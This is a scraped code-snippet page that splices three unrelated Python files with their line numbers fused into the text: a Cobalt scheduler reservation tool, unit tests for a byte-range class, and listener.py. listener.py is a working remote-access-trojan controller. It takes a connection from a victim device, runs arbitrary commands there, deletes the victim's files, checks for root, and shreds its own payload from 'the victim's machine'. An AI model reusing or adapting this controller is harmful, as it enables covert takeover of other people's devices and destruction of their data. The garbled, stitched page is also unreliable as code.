Best Python code snippet using autotest_python
setres.py
Source:setres.py
1#!/usr/bin/env python2"""3Setup reservations in the scheduler4Usage: %prog --help5Usage: %prog [options] <partition1> ... <partitionN>6version: "%prog " + __revision__ + , Cobalt + __version__7OPTIONS DEFINITIONS:8'-A','--project',dest='project',type='string',help='set project name for partitions in args'9'-D','--defer',dest='defer',help='defer flag. needs to be used with -m',action='store_true'10'-c','--cycletime',dest='cycle',type='string',help='set cycle time in minutes or HH:MM:SS',callback=cb_time11'-d','--duration',dest='duration',type='string',help='duration time in minutes or HH:MM:SS',callback=cb_time12'-m','--modify_res',dest='modify_res',help='modify current reservation specified in -n',action='store_true'13'-n','--name',dest='name',type='string',help='reservation name to add or modify'14'-p','--partitions',dest='partitions',type='string',help='partition(s) (now optional) part1:..:partN'15'-q','--queue',dest='queue',type='string',help='queue name'16'-s','--starttime',dest='start',type='string',help='start date time: YYYY_MM_DD-HH:MM, or now',callback=cb_date17'-u','--user',dest='users',type='string',help='user id list (user1:user2:... or "*" for all users)',callback=cb_res_users18'--debug',dest='debug',help='turn on communication debugging',callback=cb_debug19'--allow_passthrough',dest='block_passthrough',help='allow passthrough',callback=cb_passthrough20'--block_passthrough',dest='block_passthrough',help='do not allow passthrough',callback=cb_passthrough21OPTIONS TO CHANGE IDS ONLY:22'--cycle_id',dest='cycle_id',type='int',help='cycle id'23'--force_id',dest='force_id',default=False,help='force id flag (only used with --cycle_id or --res_id',action='store_true'24'--res_id',dest='res_id',type='int',help='res id'25"""26import logging27import math28import sys29import time30from Cobalt import client_utils31from Cobalt.client_utils import cb_debug, cb_time, cb_date, cb_passthrough, cb_res_users32from Cobalt.Util import expand_num_list, compact_num_list33from Cobalt.arg_parser import ArgParse34__revision__ = '$Id: setres.py 2154 2011-05-25 00:22:56Z richp $'35__version__ = '$Version$'36SCHMGR = client_utils.SCHMGR37SYSMGR = client_utils.SYSMGR38def validate_starttime(parser):39 """40 make sure the start time plus duration is valid41 """42 _localtime = client_utils.parse_datetime(client_utils.cobalt_date(time.localtime(time.time())))43 _res_st = parser.options.start + parser.options.duration44 if _res_st < _localtime:45 client_utils.logger.error("Start time + duration %s already in the pass", client_utils.sec_to_str(_res_st))46 sys.exit(1)47def set_res_id(parser):48 """49 set res id50 """51 if parser.options.force_id:52 client_utils.component_call(SCHMGR, False, 'force_res_id', (parser.options.res_id,))53 client_utils.logger.info("WARNING: Forcing res id to %s" % parser.options.res_id)54 else:55 client_utils.component_call(SCHMGR, False, 'set_res_id', (parser.options.res_id,))56 client_utils.logger.info("Setting res id to %s" % parser.options.res_id)57def set_cycle_id(parser):58 """59 set res id60 """61 cycle_id = parser.options.cycle_id62 if parser.options.force_id:63 client_utils.component_call(SCHMGR, False, 'force_cycle_id', (cycle_id,))64 client_utils.logger.info("WARNING: Forcing cycle id to %s" % str(cycle_id))65 else:66 client_utils.component_call(SCHMGR, False, 'set_cycle_id', (cycle_id,))67 client_utils.logger.info("Setting cycle_id to %s" % str(cycle_id))68def verify_locations(partitions):69 """70 verify that partitions are valid71 """72 check_partitions = partitions73 system_type = client_utils.component_call(SYSMGR, False, 'get_implementation', ())74 # if we have args then verify the args (partitions)75 if system_type in ['alps_system']:76 # nodes come in as a compact list. expand this.77 check_partitions = []78 # if we're not a compact list, convert to a compact list. Get this,79 # ideally, in one call80 for num_list in partitions:81 check_partitions.extend(expand_num_list(num_list))82 test_parts = client_utils.component_call(SYSMGR, False,83 'verify_locations', (check_partitions,))84 # On Cray we will be a little looser to make setting reservations85 # easier.86 client_utils.logger.info('Found Nodes: %s', compact_num_list(test_parts))87 missing_nodes = set(check_partitions) - set(test_parts)88 if len(missing_nodes) != 0:89 # TODO: relax this, we should allow for this to occur, but90 # reservation-queue data amalgamation will need a fix to get91 # this to work. --PMR92 client_utils.logger.error("Missing partitions: %s" % (",".join([str(nid) for nid in missing_nodes])))93 client_utils.logger.error("Aborting reservation setup.")94 sys.exit(1)95 #sys.exit(1)96 else:97 for p in check_partitions:98 test_parts = client_utils.component_call(SYSMGR, False,99 'verify_locations', (check_partitions,))100 if len(test_parts) != len(check_partitions):101 missing = [p for p in check_partitions if p not in test_parts]102 client_utils.logger.error("Missing partitions: %s" % (" ".join(missing)))103 sys.exit(1)104def validate_args(parser,spec,opt_count):105 """106 Validate setres arguments. Will return true if we want to continue processing options.107 """108 system_type = client_utils.component_call(SYSMGR, False, 'get_implementation', ())109 if parser.options.partitions is not None:110 parser.args += [part for part in parser.options.partitions.split(':')]111 if parser.options.cycle_id is not None or parser.options.res_id is not None:112 only_id_change = True113 if not parser.no_args() or (opt_count != 0):114 client_utils.logger.error('No partition arguments or other options allowed with id change options')115 sys.exit(1)116 else:117 only_id_change = False118 if parser.options.force_id and not only_id_change:119 client_utils.logger.error("--force_id can only be used with --cycle_id and/or --res_id.")120 sys.exit(1)121 if only_id_change:122 # make the ID change and we are done with setres123 if parser.options.res_id is not None:124 set_res_id(parser)125 if parser.options.cycle_id is not None:126 set_cycle_id(parser)127 continue_processing_options = False # quit, setres is done128 else:129 if parser.options.name is None:130 client_utils.print_usage(parser)131 sys.exit(1)132 if parser.no_args() and (parser.options.modify_res is None):133 client_utils.logger.error("Must supply either -p with value or partitions as arguments")134 sys.exit(1)135 if parser.options.start is None and parser.options.modify_res is None:136 client_utils.logger.error("Must supply a start time for the reservation with -s")137 sys.exit(1)138 if parser.options.duration is None and parser.options.modify_res is None:139 client_utils.logger.error("Must supply a duration time for the reservation with -d")140 sys.exit(1)141 if parser.options.defer is not None and (parser.options.start is not None or parser.options.cycle is not None):142 client_utils.logger.error("Cannot use -D while changing start or cycle time")143 sys.exit(1)144 # if we have command line arguments put them in spec145 if system_type in ['alps_system']:146 if not parser.no_args():147 nodes = []148 for arg in parser.args:149 nodes.extend(expand_num_list(arg))150 compact_nodes = compact_num_list(nodes)151 verify_locations([compact_nodes])152 spec['partitions'] = compact_nodes153 else:154 if not parser.no_args():155 verify_locations(parser.args)156 if not parser.no_args(): spec['partitions'] = ":".join(parser.args)157 continue_processing_options = True # continue, setres is not done.158 return continue_processing_options159def modify_reservation(parser):160 """161 this will handle reservation modifications162 """163 query = [{'name':parser.options.name, 'start':'*', 'cycle':'*', 'duration':'*'}]164 res_list = client_utils.component_call(SCHMGR, False, 'get_reservations', (query,))165 if not res_list:166 client_utils.logger.error("cannot find reservation named '%s'" % parser.options.name)167 sys.exit(1)168 updates = {} # updates to reservation169 if parser.options.defer is not None:170 res = res_list[0]171 if not res['cycle']:172 client_utils.logger.error("Cannot use -D on a non-cyclic reservation")173 sys.exit(1)174 start = res['start']175 duration = res['duration']176 cycle = float(res['cycle'])177 now = time.time()178 periods = math.floor((now - start)/cycle)179 if periods < 0:180 start += cycle181 elif(now - start) % cycle < duration:182 start += (periods + 1) * cycle183 else:184 start += (periods + 2) * cycle185 newstart = time.strftime("%c", time.localtime(start))186 client_utils.logger.info("Setting new start time for for reservation '%s': %s" % (res['name'], newstart))187 updates['start'] = start188 #add a field to updates to indicate we're deferring:189 updates['defer'] = True190 else:191 if parser.options.start is not None:192 updates['start'] = parser.options.start193 if parser.options.duration is not None:194 updates['duration'] = parser.options.duration195 if parser.options.users is not None:196 updates['users'] = None if parser.options.users == "*" else parser.options.users197 if parser.options.project is not None:198 updates['project'] = parser.options.project199 if parser.options.cycle is not None:200 updates['cycle'] = parser.options.cycle201 if not parser.no_args():202 updates['partitions'] = ":".join(parser.args)203 if parser.options.block_passthrough is not None:204 updates['block_passthrough'] = parser.options.block_passthrough205 comp_args = ([{'name':parser.options.name}], updates, client_utils.getuid())206 client_utils.component_call(SCHMGR, False, 'set_reservations', comp_args)207 reservations = client_utils.component_call(SCHMGR, False, 'get_reservations',208 ([{'name':parser.options.name, 'users':'*','start':'*', 'duration':'*',209 'partitions':'*', 'cycle': '*', 'res_id': '*', 'project':'*',210 'block_passthrough':'*'}], ))211 client_utils.logger.info(reservations)212 client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'check_reservations', ()))213def add_reservation(parser,spec,user):214 """215 add reservation216 """217 validate_starttime(parser)218 spec['users'] = None if parser.options.users == '*' else parser.options.users219 spec['cycle'] = parser.options.cycle220 spec['project'] = parser.options.project221 if parser.options.block_passthrough is None:222 spec['block_passthrough'] = False223 client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'add_reservations', ([spec], user)))224 client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'check_reservations', ()))225def main():226 """227 setres main228 """229 # setup logging for client. The clients should call this before doing anything else.230 client_utils.setup_logging(logging.INFO)231 spec = {} # map of destination option strings and parsed values232 opts = {} # old map233 opt2spec = {}234 # list of callback with its arguments235 callbacks = [236 # <cb function> <cb args>237 [ cb_time , (False, True, True) ], # no delta time, Seconds, return int238 [ cb_date , (True,) ], # Allow to set the date to 'now'239 [ cb_passthrough , () ],240 [ cb_debug , () ],241 [ cb_res_users , () ]]242 # Get the version information243 opt_def = __doc__.replace('__revision__',__revision__)244 opt_def = opt_def.replace('__version__',__version__)245 parser = ArgParse(opt_def,callbacks)246 user = client_utils.getuid()247 parser.parse_it() # parse the command line248 opt_count = client_utils.get_options(spec, opts, opt2spec, parser)249 # if continue to process options then250 if validate_args(parser,spec,opt_count):251 # modify an existing reservation252 if parser.options.modify_res is not None:253 modify_reservation(parser)254 # add new reservation255 else:256 add_reservation(parser,spec,user)257if __name__ == '__main__':258 try:259 main()260 except SystemExit:261 raise262 except Exception, exc:263 client_utils.logger.fatal("*** FATAL EXCEPTION: %s ***", exc)...
listener.py
Source:listener.py
1import os2import sys3from time import sleep4host = sys.argv[1]5port = int(sys.argv[2])6output = sys.argv[3]7import socket8import sys9from time import asctime10from time import sleep11print(("[" + asctime() + "] Listening on port " + str(port)))12sleep(1)13try:14 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)15 s.bind((host, port))16 s.listen(5)17 print("[" + asctime() + "] Waiting Connection From Client...")18 c, _ = s.accept()19 print(('[' + asctime() + '] Session Opened | ' + 'IP : ' + _[0] + ' | Port : ' + str(_[1])+'\n'))20 sleep(2)21except OSError as error:22 print('[i] ' + str(error))23 sys.exit()24def raw_converter(string):25 string = str(string)26 n = r'\n'27 t = r'\t'28 bs = r"b'"29 be = r"\n'"30 result = string.replace(bs, '')31 result = result.replace(be, r'\n')32 result = result.replace(n, '\n')33 result = result.replace(t, '\t')34 return result35def main(prog_name):36 and_pwd = ' && pwd\n'37 meminfo = 'cat /proc/meminfo'38 nuke_it = 'shred --force -n 35 -u -v -z ' + prog_name39 cpuinfo = 'cat /proc/cpuinfo'40 crypto = 'cat /proc/crypto'41 check_root = 'which su'42 check_partitions = 'cat /proc/partitions'43 whoami = 'whoami'44 and_pwd = and_pwd.encode()45 meminfo = meminfo.encode()46 nuke_it = nuke_it.encode()47 cpuinfo = cpuinfo.encode()48 crypto = crypto.encode()49 check_root = check_root.encode()50 check_partitions = check_partitions.encode()51 whoami = whoami.encode()52 print("[i] Type '#help' for information.")53 while True:54 hosttt = _[0]55 cmd = input('[' + asctime() + ' | BRAT@' + hosttt + ']: ')56 57 if cmd[0:5] == 'mkdir':58 cmd = cmd.encode()59 c.send(cmd+and_pwd)60 output = c.recv(100000)61 output = raw_converter(output)62 print(output)63 64 elif cmd == 'meminfo':65 c.send(meminfo)66 output = c.recv(100000)67 output = raw_converter(output)68 print(output)69 70 elif cmd == 'cpuinfo':71 c.send(cpuinfo)72 output = c.recv(100000)73 output = raw_converter(output)74 print(output)75 76 elif cmd == 'crypto':77 c.send(crypto)78 output = c.recv(100000)79 output = raw_converter(output)80 print(output)81 82 elif cmd == 'kernel_info':83 cmd = cmd.encode()84 c.send(cmd)85 ab = c.recv(100000)86 ab = raw_converter(ab)87 print(("\n[+] \033[37;1mKernel Version : "+str(ab)))88 89 elif cmd == 'check_root':90 c.send(check_root)91 a = c.recv(100000)92 if a == r'\n/system/bin/su\n':93 print("\n[*] This Device Is Rooted...\n")94 95 else:96 print("\n[*] This Device Not Rooted...\n")97 98 elif cmd == 'su':99 print("\n[*] Command 'SU' Not *Yet* Working...\n")100 continue101 102 elif cmd == 'check_partitions':103 c.send(check_partitions)104 print('')105 output = c.recv(1000000)106 output = raw_converter(output)107 print(output)108 109 elif cmd == '#help':110 print("""111#help : Shows this help menu112kernel_info : Check Kernel Version + Info113mkdir : Create Directory On Target114meminfo : Check Info Memory Target115cpuinfo : Check Info CPU Target116rm : Remove File On Target117rmdir : Remove Folder On Target118whoami : Check Name User Target119crypto : Check Encoding On Target120check_partitions : Check Info Partisi On Target121#nuke : Shred and delete the payload from the victim's machine122#logout : Close the connection123""")124 elif cmd[0:2] == 'rm':125 cmd = cmd.encode()126 c.send(cmd+and_pwd)127 output = c.recv(100000)128 output = raw_converter(output)129 130 elif cmd[0:5] == 'rmdir':131 cmd = cmd.encode()132 c.send(cmd+and_pwd)133 output = c.recv(100000)134 output = raw_converter(output)135 print(output)136 137 elif cmd[0:6] == 'whoami':138 c.send(whoami)139 output = c.recv(100000)140 output = raw_converter(output)141 print(output)142 elif cmd == '#nuke':143 c.send(nuke_it)144 output = c.recv(100000)145 output = raw_converter(output)146 print(output)147 elif cmd == '#logout':148 #c.close()149 print("[" + asctime() + "] Connection closed by local host...")150 break151 152 elif cmd == '':153 continue154 155 else:156 cmd = cmd.encode()157 c.send(cmd)158 results = c.recv(100000)159 results = raw_converter(results)160 if results == 'bacod':161 continue162 print(results)163try:164 main(output)165except KeyboardInterrupt:166 print("[!] CTRL+C Detected. Shutdown Server...")167 sleep(2)168 sys.exit()169except socket.error:170 print("[!] Connection closed by foreign host...")171 sleep(2)...
test_byte_range.py
Source:test_byte_range.py
...12 def check_partition(self, byte_range, expected):13 assert isinstance(byte_range, ByteRange)14 assert isinstance(expected, bool)15 self.assertEqual(expected, byte_range.does_partition())16 def check_partitions(self, *params):17 assert len(params) % 2 == 018 for idx in xrange(0, len(params), 2):19 self.check_partition(params[idx], params[idx+1])20 def test_add_subrange(self):21 """22 Test add_subrange() method23 """24 br = ByteRange(0, 1000)25 self.check_partition(br, True)26 self.assertEqual('<BytesRange:0-1000>', str(br))27 # Add 1st subrange28 br.add_subrange(offset=100, length=51)29 self.check_partition(br, False)30 self.check_subranges(br, (100, 151))31 # Add a subrange in the front32 br.add_subrange(offset=50, length=7)33 self.check_partition(br, False)34 self.check_subranges(br, (50, 57), (100, 151))35 # Add a subrange in the end36 br.add_subrange(offset=200, length=800)37 self.check_partition(br, False)38 self.check_subranges(br, (50, 57), (100, 151), (200, 1000))39 # Fill out the remaining gap to completely cover the byte range40 br.add_subrange(offset=0, length=50)41 br.add_subrange(offset=57, length=43)42 br.add_subrange(offset=151, length=49)43 self.check_partition(br, True)44 self.check_subranges(br, (0, 50), (50, 57), (57, 100), (100, 151), (151, 200), (200, 1000))45 def test_nested_subranges(self):46 """47 Test nested subranges methods48 """49 br1 = ByteRange(0, 100)50 self.check_partitions(br1, True)51 # Add 2nd layer52 br11 = br1.add_subrange(0, 20)53 self.check_partitions(br1, False, br11, True)54 br12 = br1.add_subrange(20, 50)55 self.check_partitions(br1, False, br12, True)56 br13 = br1.add_subrange(70, 30)57 self.check_partitions(br1, True, br13, True)58 # Add 3rd layer59 br121 = br12.add_subrange(0, 30)60 self.check_partitions(br1, False, br12, False, br121, True)61 br122 = br12.add_subrange(30, 20)62 self.check_partitions(br1, True, br12, True, br122, True)63 # Add 4th layer64 br1211 = br121.add_subrange(0, 15)65 self.check_partitions(br1, False, br12, False, br121, False, br1211, True)66 br1212 = br121.add_subrange(15, 10)67 self.check_partitions(br1, False, br12, False, br121, False, br1212, True)68 br1213 = br121.add_subrange(25, 5)69 self.check_partitions(br1, True, br12, True, br121, True, br1213, True)70 # Verify all the absolute offsets71 self.assertEqual((0, 20), br11.abs_range())72 self.assertEqual((20, 35), br1211.abs_range())73 self.assertEqual((35, 45), br1212.abs_range())74 self.assertEqual((45, 50), br1213.abs_range())75 self.assertEqual((50, 70), br122.abs_range())76 self.assertEqual((70, 100), br13.abs_range())77 def test_errors(self):78 br = ByteRange(0, 100)79 # Add 2 subranges80 br.add_subrange(20, 10)81 br.add_subrange(60, 20)82 # Add an overlapping subrange in front of 1st subrange83 self.assertRaises(ValueError, lambda: br.add_subrange(0, 21))...
Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.
Get 100 minutes of automation test minutes FREE!!